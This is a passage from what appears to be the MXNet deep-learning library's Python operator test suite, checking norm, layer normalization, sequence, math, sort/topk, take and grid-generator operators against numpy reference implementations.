else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
